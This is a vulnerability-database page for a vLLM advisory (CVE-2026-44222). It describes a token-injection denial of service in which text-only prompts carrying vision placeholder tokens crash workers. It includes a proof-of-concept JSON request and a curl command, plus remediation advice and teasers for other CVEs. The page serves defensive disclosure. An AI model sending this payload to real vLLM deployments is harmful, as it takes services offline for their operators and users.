vLLM CVE-2026-44222
MEDIUMSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
2Blast Radius
ecosystem impact- 1 pypi packages depend on vllm (1 direct, 0 indirect)
Ecosystem-wide dependent count for version 0.6.1.
DescriptionGitHub Advisory
Summary
This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
Details
- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
- vllm/model_executor/layers/rotary_embedding.py
- get_input_positions_tensor(...)
- _vl_get_input_positions_tensor(...)
- Failure mechanism:
- The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
- When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
Representative snippet (context):
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
cls,
input_tokens,
hf_config,
image_grid_thw,
video_grid_thw,
...,
):
# detect video tokens
video_nums = (vision_tokens == video_token_id).sum()
# later in processing
t, h, w = (
video_grid_thw[video_index][0],
# IndexError if no video data
video_grid_thw[video_index][1],
video_grid_thw[video_index][2],
)Abbreviated call path:
OpenAI API request
→ vllm.v1.engine.core: step/execute_model
→ vllm.v1.worker.gpu_model_runner: _update_states/execute_model
→ vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
→ _vl_get_input_positions_tensor
→ IndexError: list index out of rangePoC
Environment
- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:
python -m vllm.entrypoints.openai.api_server \
--model Qwen/Qwen2.5-VL-3B-Instruct \
--port 8000Request (text-only, no image/video data)
cat > request.json <<'JSON'
{
"model": "Qwen/Qwen2.5-VL-3B-Instruct",
"messages": [
{
"role": "user",
"content": [
{ "type": "text",
"text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
]
}
]
}
JSON
curl -s http://127.0.0.1:8000/v1/chat/completions \
-H 'Content-Type: application/json' \
--data @request.jsonObserved result
- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
- In some deployments, the worker exits and capacity remains reduced until manual restart.
Impact
- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
Fixes
- Changes associated with https://github.com/vllm-project/vllm/issues/32656
Credits
Pengyu Ding (Infra Security, Ant Group) Ziteng Xu (Infra Security, Ant Group)
AnalysisAI
Remote denial of service in vLLM 0.6.1 through 0.19.x allows unauthenticated attackers to crash worker processes by sending text-only prompts containing special multimodal placeholder tokens (e.g., '<|vision_start|><|image_pad|><|vision_end|>') without corresponding image or video data. The vulnerability stems from unprotected array indexing in the input position computation layer when processing vision tokens, causing an IndexError that terminates the worker and degrades service availability. A single malicious request can trigger the fault.
Technical ContextAI
The vulnerability exists in vLLM's multimodal input processing pipeline, specifically in the _vl_get_input_positions_tensor() function within vllm/model_executor/layers/rotary_embedding.py. This function is responsible for computing positional embeddings for vision language models (VLMs) that support multimodal inputs. The code detects vision tokens (image and video placeholders) in the input token stream and attempts to index into corresponding grid metadata arrays (image_grid_thw and video_grid_thw) to retrieve spatial dimensions. However, when user input contains special vision token sequences without actual multimodal payload data, these grid arrays remain empty. The code performs direct indexing without bounds checking, triggering an IndexError: list index out of range when attempting to access grid[video_index][dimension]. The root cause is Improper Input Validation (CWE-129), where user-controlled token sequences are not validated before array indexing operations. This affects all VLM deployments using the rotary embedding computation path, including models like Qwen2.5-VL.
RemediationAI
Upgrade vLLM to version 0.20.0 or later, which includes bounds checking and proper validation of vision grid arrays before indexing. For environments unable to upgrade immediately, implement rate limiting and request validation at the API gateway level: reject or sanitize text inputs containing special vision token sequences (<|vision_start|>, <|image_pad|>, <|vision_end|>, etc.) unless accompanied by actual image or video data in the request payload. Additionally, configure process monitoring and auto-restart policies for vLLM workers to minimize downtime from crashes; for example, use systemd or Kubernetes restart policies set to 'Always'. Implement request signing or API key validation if not already in place to reduce exposure to unauthenticated attacks, though this is a workaround rather than a fix. The primary remediation is patching to 0.20.0 or later. See advisory https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f and issue https://github.com/vllm-project/vllm/issues/32656 for implementation details.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-129 – Improper Validation of Array Index
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-hpv8-x276-m59f